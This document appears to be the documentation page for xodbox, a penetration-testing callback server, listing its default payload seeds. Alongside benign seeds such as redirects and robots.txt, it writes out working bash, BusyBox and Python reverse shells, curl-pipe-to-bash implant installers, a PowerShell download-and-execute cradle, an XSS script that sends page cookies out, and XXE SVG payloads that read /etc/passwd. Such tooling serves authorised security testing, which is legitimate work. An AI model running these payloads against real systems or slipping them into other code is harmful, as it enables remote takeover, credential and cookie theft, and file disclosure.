Default payloads that come with xodbox.
This is the multi-page printable view of this section. Click here to print.
Default Payloads Seeds
seed data
- 1: Default Header
- 2: Redirect
- 3: Remote Address Reflector
- 4: Robots TXT
- 5: Build MDaaS
- 6: Inspect
- 7: XSS HTML
- 8: XSS JavaScript
- 9: Default Favicon
- 10: Bash Reverse Shell
- 11: Bind Shell
- 12: BusyBox Reverse Shell
- 13: Detect platform
- 14: HTML IFrame With Request Params
- 15: Open Graph
- 16: Python Reverse Shell
- 17: Reverse Shell
- 18: Simple SSH
- 19: Simple SSH Service
- 20: XSS Image Template
- 21: XXE Callback
- 22: XXE DTD
- 23: XXE SVG Hostname
- 24: XXE SVG Passwd
- 25: XXE SVG Request Params
- 26: XXE System
- 27: Default Page
- 28: In Development Seeds
- 28.1: Bind shell powershell
- 28.2: Pipe Process List to Notifier
- 28.3: WPAD
1 - Default Header
Adds the default header to all HTTP responses.
Adds an HTTP header to all HTTP responses.
Example Request
curl -i http://xodbox.test/
Example Response
Server: BreakfastBot/1.0.0
2 - Redirect
HTTP Redirects
HTTP Redirects to the query parameter l using the query param s as the status code.
| What | Description | GET Parameters |
|---|---|---|
| Location | Location to redirect to | l |
| Status | HTTP status code | s |
Example Request
curl -i "http://xodbox.test/redir?l=https://github.com/defektive/xodbox&s=301"
Example Response
Location: https://github.com/defektive/xodbox
3 - Remote Address Reflector
A restrictive robots.txt
Simple robots txt to prevent indexing.
Example Request
curl http://xodbox.test/ip
Example Response
10.1.2.3
4 - Robots TXT
A restrictive robots.txt
Simple robots txt to prevent indexing.
Example Request
curl http://xodbox.test/robots.txt
Example Response
User-Agent: *
Disallow: /
5 - Build MDaaS
Build random binaries
6 - Inspect
Reflect back HTTP requests in various formats
Depends on an internal code
/inspect
Inspect or reflect the request back in various formats.
- Plain Text (default, .txt)
- HTML (.html, .html)
- GIF (.gif)
- JPEG (.jpg)
- PNG (.png)
- MP4 (.mp4)
- XML (.xml)
- JSON (.json)
- Javascript (.js)
Examples
- http://localhost/inspect
- http://localhost/some/random/path/inspect.gif
7 - XSS HTML
Returns HTML that embeds xss-js
/jsc.html
Simple HTML to load simple JS Payload.
8 - XSS JavaScript
Returns JS that embeds an image back to xodbox
/jsc
Simple JS Payload. Useful form embedding or quickly copying and modifying for an XSS payload to prove execution and exfil.
(function (){
var s = document.createElement("img");
document.body.appendChild(s);
s.src="//{{.Request.Host}}/{{ .NotifyString}}/jscb?src="+window.location+"&c="+document.cookie;
})()
9 - Default Favicon
Redirects to the default logo.
Redirects to the embedded default logo, exposed via embedded fs.
Example Request
curl -i http://xodbox.test/favicon.ico
10 - Bash Reverse Shell
BusyBox Reverse Shell
Useful for reverse shells on busybox systems.
Example Request
Params
| Parameter | Default Value | Description |
|---|---|---|
| h | Client IP address | Host to connect to |
| p | 9091 | Port to connect to |
curl -i "http://xodbox.test/rsh/bash?h=10.10.10.10&p=9090"
Example Response
bash -i >& /dev/tcp/127.0.0.1/9091 0>&1
0<&196;exec 196<>/dev/tcp/127.0.0.1/9091 ; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/127.0.0.1/9091 0<&1 2>&1
11 - Bind Shell
Requires bind-shell in static dir
Build a bind shell implant for the specific platform and execute it.
Example Request
curl xodbox/bind.sh|bash
12 - BusyBox Reverse Shell
BusyBox Reverse Shell
Useful for reverse shells on busybox systems.
Example Request
Params
| Parameter | Default Value | Description |
|---|---|---|
| h | Client IP address | Host to connect to |
| p | 9091 | Port to connect to |
curl -i "http://xodbox.test/rsh/bb?h=10.10.10.10&p=9090"
Example Response
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1111 >/tmp/f
13 - Detect platform
detect platform
Example Request
curl -i "http://xodbox.test/detect.sh"
This will curl the notification url with the detected values in the path.
14 - HTML IFrame With Request Params
Returns an HTML page with an iframe src to f query parameter
/ht
attempts to get whatever files is supplied via the f query parameter
15 - Open Graph
Embed request params in open graph elements.
Useful for unfurlers. Maybe we should merge this into inspect…
Example Request
curl -i "http://xodbox.test/unfurl"
Example Response
Location: https://github.com/defektive/xodbox
16 - Python Reverse Shell
Python Reverse Shell
Useful for reverse shells on busybox systems.
Example Request
Params
| Parameter | Default Value | Description |
|---|---|---|
| h | Client IP address | Host to connect to |
| p | 9091 | Port to connect to |
curl -i "http://xodbox.test/rsh/python?h=10.10.10.10&p=9090"
Example Response
import socket,os,pty;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("127.0.0.1",9091));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
pty.spawn("/bin/sh")
17 - Reverse Shell
Requires bind-shell in static dir
Build a reverse shell implant for the specific platform and execute it.
Example Request
curl xodbox/reverse.sh|bash
18 - Simple SSH
Simple SSH (requires build of simple ssh server in static dir)
Build an SSH server implant for the specific platform and execute it.
Example Request
curl xodbox/ssh.sh|bash
19 - Simple SSH Service
Simple SSH Service (requires build of simple ssh server in static dir)
Build an SSH server implant for the specific platform and install it as a service, then start the service.
Example Request
curl xodbox/ssh.sh|bash
20 - XSS Image Template
A text template for quickly embedding js execution hooks into pages the image tags
21 - XXE Callback
More XXE
XXE Callback used by xxe-system
22 - XXE DTD
More XXE
/dt
A vulnerable application for testing is in ../../../../cmd/xodbox-validator
/evil.dtd
dtd for use by others
23 - XXE SVG Hostname
Returns an SVG payload with XXE to get files
/sh
attempts to get /etc/hostname
SVG with XXE payloads
24 - XXE SVG Passwd
Returns an SVG payload with XXE to get files
/sp
attempts to get /etc/passwd
25 - XXE SVG Request Params
Returns an SVG payload with XXE to get files
/sv
attempts to get whatever files is supplied via the f query parameter
26 - XXE System
More XXE
/dt
A vulnerable application for testing is in ../../../../cmd/xodbox-validator
27 - Default Page
returns a simple page if nothing is matched
Adds an HTTP header to all HTTP responses.
Example Request
curl -i http://xodbox.test/
Example Response
hi
28 - In Development Seeds
These seeds are not ready for production and may never be.
Seeds that are not tested or finished.
28.1 - Bind shell powershell
Requires bind-shell in static dir
iex ((New-Object System.Net.WebClient).DownloadString('http://xobox/bind.ps1'))
28.2 - Pipe Process List to Notifier
Simple script to pipe ps to the notification URL
Example Request
curl xodbox/pipe.sh|bash
28.3 - WPAD
Returns a WPAD config file (Javascript).
WPAD Proxy. Not really useful at the moment. Should be more useful in the future